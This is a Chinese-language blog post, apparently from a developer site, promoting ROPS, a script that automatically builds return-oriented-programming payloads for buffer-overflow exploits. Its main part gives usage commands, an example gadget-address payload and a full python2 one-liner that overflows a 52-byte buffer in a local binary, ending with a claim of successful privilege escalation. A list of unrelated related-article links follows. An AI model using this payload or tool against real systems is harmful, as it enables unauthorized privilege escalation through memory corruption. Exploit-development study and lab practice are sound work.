ROPS 自动化快速构造缓冲区溢出ROP链工具

项目地址:https://github.com/MartinxMax/ROPS

ROPS

快速自动化构造ROP(Return-Oriented Programming)链的脚本,用于生成ROP攻击的有效载荷。

Usage

$ ./rops.sh

$ ./rops.sh /home/ayush/.binary/rop

该脚本将根据提供的二进制文件自动生成有效的ROP链有效载荷。一旦确认了缓冲区溢出的大小,您就可以使用脚本生成的有效载荷。

脚本生成的有效载荷会自动转换为小端字节序,因此可以直接通过复制来使用。

示例有效载荷:

payload => BUFFER + 0xA03DE5B7 + 0xD079E4B7 + 0x0B4AF7B7

在GDB示例中,我们确认了缓冲区大小为52,根据载荷结果,再次构造最终的载荷

/home/ayush/.binary/rop $(python2 -c 'print "A"*52 + "\xA0\x3D\xE5\xB7" + "\xD0\x79\xE4\xB7"+"\x0B\x4A\xF7\xB7"')

成功权限提升

相关推荐
xywww1684 小时前
大模型 API 选型实战:GPT、Gemini、Claude 接入时该看哪些指标?
运维·服务器·人工智能·python·gpt·langchain
梦想的颜色7 小时前
【Docker原理】Docker 容器一文打尽:生命周期、环境管控、迁移备份、日志进程排查、垃圾清理
运维·docker·容器·容器生命周期·容器日志排查·容器迁移备份·容器进程管理
donoot9 小时前
Linux系统下图书馆级电子书全自动标准化分类整理完整实施方案
大数据·linux·运维·电子书管理
ITKEY_9 小时前
macOS brew 安装的nginx 文件在哪里?
运维·nginx·macos
Elastic 中国社区官方博客10 小时前
如何比较两个 Elasticsearch 索引并找出缺失的文档
大数据·运维·数据库·elasticsearch·搜索引擎
BJHHZX199111 小时前
北京华恒智信为制造行业破解自动化伪升级难题,落地人机协作三阶段减编增效方案
自动化·绩效考核·人力资源管理·人机协作·员工激励
Tim_Van11 小时前
在 CentOS 7 中安装 Chromium 的完整步骤
linux·运维·chrome·centos
孫治AllenSun11 小时前
【Nginx】配置参数和使用案例
运维·nginx
啵啵鱼爱吃小猫咪13 小时前
Ubuntu 20.04 + ROS Noetic 源码安装 libfranka 0.8.0 和 franka_ros 0.8.0 完整教程
linux·运维·ubuntu
Piko61413 小时前
锐捷 VSU 虚拟化堆叠配置
运维·网络·笔记